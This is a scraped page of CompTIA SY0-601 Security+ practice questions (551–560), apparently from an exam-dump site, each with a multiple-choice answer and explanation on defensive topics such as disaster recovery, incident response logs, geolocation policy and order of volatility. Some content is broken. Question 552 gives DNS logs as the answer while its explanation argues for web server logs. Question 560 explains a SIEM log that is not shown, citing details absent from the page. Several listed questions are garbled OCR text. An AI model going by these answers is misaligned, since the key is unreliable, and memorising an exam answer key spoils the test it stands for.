ExamGecko
Search Search Login
Home Home / CompTIA / SY0-601

CompTIA SY0-601 Practice Test - Questions Answers, Page 56

Question list
Search
Search

List of questions

Search
Open VPLUS File
Convert VPLUS to PDF

Related questions

A security analyst notices an unusual amount of traffic hitting the edge of the network. Upon examining the logs, the analyst identifies a source IP address and blocks that address from communicating with the network. Even though the analyst is blocking this address, the attack is still ongoing and coming from a large number of different source IP addresses. Which of the following describes this type of attack?
HOTSPOT You received the output of a recent vulnerability assessment. Review the assessment and scan output and determine the appropriate remedialion(s} 'or «ach dewce. Remediation options may be selected multiple times, and some devices may require more than one remediation. If at any time you would like to biing bade the initial state ot the simulation, please dick me Reset All button.
A new vulnerability enables a type of malware that allows the unauthorized movement of data from a system Which of the following would detect this behavior?
A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?
Which of the following threat actors is most likely to be motivated by ideology?
Which Of the following vulnerabilities is exploited an attacker Overwrite a reg-ister with a malicious address that changes the execution path?
Which Of the following will provide the best physical security countermeasures to Stop intruders? (Select two).
Which of the following would most likely include language prohibiting end users from accessing personal email from a company device?
A police department is using the cloud to share information city officials Which of the cloud models describes this scenario?
Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Question 551

Report
Export
Collapse

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

A.
Warm site
A.
Warm site
Answers
B.
Generator
B.
Generator
Answers
C.
Hot site
C.
Hot site
Answers
D.
Cold site
D.
Cold site
Answers
E.
Cloud backups
E.
Cloud backups
Answers
F.
UPS
F.
UPS
Answers
Suggested answer: B, F

Explanation:

A generator and a UPS (uninterruptible power supply) are low-cost solutions that can provide backup power to an organization in case of a power outage. A generator is a device that converts mechanical energy into electrical energy, while a UPS is a device that provides battery power to a system when the main power source fails. A generator and a UPS can help the organization to maintain its operations and prevent data loss during a power outage.

Question 552

Report
Export
Collapse

A host was infected with malware. During the incident response. Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would most likely show where the malware originated?

A.
The DNS logs
A.
The DNS logs
Answers
B.
The web server logs
B.
The web server logs
Answers
C.
The SIP traffic logs
C.
The SIP traffic logs
Answers
D.
The SNMP logs
D.
The SNMP logs
Answers
Suggested answer: A

Explanation:

The web server logs are records of the requests and responses that occur between a web server and a web client, such as a browser. The web server logs can show where the malware originated by indicating the source IP address, the destination URL, the date and time, the HTTP status code, the user agent, etc., of each request and response. The web server logs can help the incident response team to trace back the malicious website that infected the host with malware.

Question 553

Report
Export
Collapse

Which of the following exercises should an organization use to improve its incident response process?

A.
Tabletop
A.
Tabletop
Answers
B.
Replication
B.
Replication
Answers
C.
Failover
C.
Failover
Answers
D.
Recovery
D.
Recovery
Answers
Suggested answer: A

Explanation:

A tabletop exercise is a type of simulation exercise that involves discussing hypothetical scenarios and testing the incident response plan in a low-stress environment. A tabletop exercise can help an organization to improve its incident response process by identifying gaps, weaknesses, roles, responsibilities, communication channels, etc., and by evaluating the effectiveness and efficiency of the plan.

Question 554

Report
Export
Collapse

A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

A.
Data masking
A.
Data masking
Answers
B.
Encryption
B.
Encryption
Answers
C.
Geolocation policy
C.
Geolocation policy
Answers
D.
Data sovereignty regulation
D.
Data sovereignty regulation
Answers
Suggested answer: C

Explanation:

A geolocation policy is a policy that restricts access to data or resources based on the physical location of the user or device. A geolocation policy can be implemented using technologies such as IP address filtering, GPS tracking, VPN blocking, etc. A geolocation policy can help the company's legal department to ensure the documents cannot be accessed by individuals in high-risk countries by denying access requests from those countries.

Question 555

Report
Export
Collapse

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would best prevent this type of attack?

A.
Network location
A.
Network location
Answers
B.
Impossible travel time
B.
Impossible travel time
Answers
C.
Geolocation
C.
Geolocation
Answers
D.
Geofencing
D.
Geofencing
Answers
Suggested answer: B

Explanation:

Impossible travel time is a security metric that detects anomalous login attempts based on the time and distance between two locations. Impossible travel time can help prevent email account compromises by flagging login attempts that occur within a short time span from locations that are far apart, such as France and Brazil. Impossible travel time can indicate that an attacker has stolen or guessed the user's credentials and is trying to access their email account from another location.

Question 556

Report
Export
Collapse

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

A.
A non-disclosure agreement
A.
A non-disclosure agreement
Answers
B.
Least privilege
B.
Least privilege
Answers
C.
An acceptable use policy
C.
An acceptable use policy
Answers
D.
Off boarding
D.
Off boarding
Answers
Suggested answer: D

Explanation:

Off boarding is a security practice that involves revoking access rights and privileges from employees who leave an organization or change their roles. Off boarding can help address the issue of successful logon attempts to access the departed executive's accounts by disabling or deleting their accounts, changing passwords, collecting devices, etc., as soon as they leave the organization.

Question 557

Report
Export
Collapse

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

A.
An external security assessment
A.
An external security assessment
Answers
B.
A bug bounty program
B.
A bug bounty program
Answers
C.
A tabletop exercise
C.
A tabletop exercise
Answers
D.
A red-team engagement
D.
A red-team engagement
Answers
Suggested answer: C

Explanation:

A tabletop exercise is a type of simulation exercise that involves discussing hypothetical scenarios and testing the incident response plan in a low-stress environment. A tabletop exercise can help the CSO to validate the business's involvement in the incident response plan by involving key stakeholders, such as senior management, business units, legal department, etc., in the discussion and evaluation of the plan.

Question 558

Report
Export
Collapse

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

A.
Segmentation
A.
Segmentation
Answers
B.
Firewall allow list
B.
Firewall allow list
Answers
C.
Containment
C.
Containment
Answers
D.
Isolation
D.
Isolation
Answers
Suggested answer: A

Explanation:

Segmentation is a security technique that divides a network into smaller subnetworks or segments based on criteria such as function, role, location, etc. Segmentation can help mitigate the risk of unauthorized access or data leakage by isolating different segments from each other and applying different security policies and controls to each segment. Segmentation can help the security manager to implement a mitigation while maintaining alerting capabilities by separating the smart generator from the internal file server and allowing only necessary communication between them.

Question 559

Report
Export
Collapse

Which of the following is the correct order of volatility from most to least volatile?

A.
Memory, temporary filesystems. routing tables, disk, network storage
A.
Memory, temporary filesystems. routing tables, disk, network storage
Answers
B.
Cache, memory, temporary filesystems. disk, archival media
B.
Cache, memory, temporary filesystems. disk, archival media
Answers
C.
Memory, disk, temporary filesystems. cache, archival media
C.
Memory, disk, temporary filesystems. cache, archival media
Answers
D.
Cache, disk, temporary filesystems. network storage, archival media
D.
Cache, disk, temporary filesystems. network storage, archival media
Answers
Suggested answer: B

Explanation:

The order of volatility is the order of how quickly data can be lost or changed in a system. The order of volatility is important for digital forensics and evidence collection, as it determines the priority and sequence of data preservation. The correct order of volatility from most to least volatile is cache, memory, temporary filesystems, disk, archival media. Cache is the fastest and most volatile type of memory that stores frequently used data. Memory is the main memory or RAM that stores data for active processes. Temporary filesystems are files that are created and deleted during normal system operations, such as swap files, print spool files, etc. Disk is the permanent storage device that stores data on magnetic or solid-state media. Archival media are devices that store data for long-term preservation, such as optical disks, tapes, etc.

Question 560

Report
Export
Collapse

A security analyst it investigating an incident to determine what an attacker was able to do on a compromised Laptop. The analyst reviews the following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

A.
An attacker was able to move laterally from PC 1 to PC2 using a pass-the-hash attach
A.
An attacker was able to move laterally from PC 1 to PC2 using a pass-the-hash attach
Answers
B.
An attacker was able to bypass the application approve list by emailing a spreadsheet. attachment with an embedded PowerShell in the file.
B.
An attacker was able to bypass the application approve list by emailing a spreadsheet. attachment with an embedded PowerShell in the file.
Answers
C.
An attacker was able to install malware to the CAasdf234 folder and use it to gain administrator rights and launch Outlook
C.
An attacker was able to install malware to the CAasdf234 folder and use it to gain administrator rights and launch Outlook
Answers
D.
An attacker was able to phish user credentials successfully from an Outlook user profile
D.
An attacker was able to phish user credentials successfully from an Outlook user profile
Answers
Suggested answer: B

Explanation:

The SIEM log shows that the user opened an email attachment named "Invoice.xlsx" and then executed a PowerShell script that downloaded and ran a malicious file from a remote server. This indicates that the attacker was able to bypass the application approve list by emailing a spreadsheet attachment with an embedded PowerShell in the file. This is a common technique used by malware authors to evade detection and deliver their payloads1.

Total 603 questions
Go to page: of 61
ExamGecko

Copyright @2023 ExamGecko | All right reserved

Mail us: [email protected]
About us
Contact us
Twitter X
Facebook
Medium
Convert VPLUS to PDF
Open VPLUS files Easily and Quickly
Privacy Policy
Disclaimer
Terms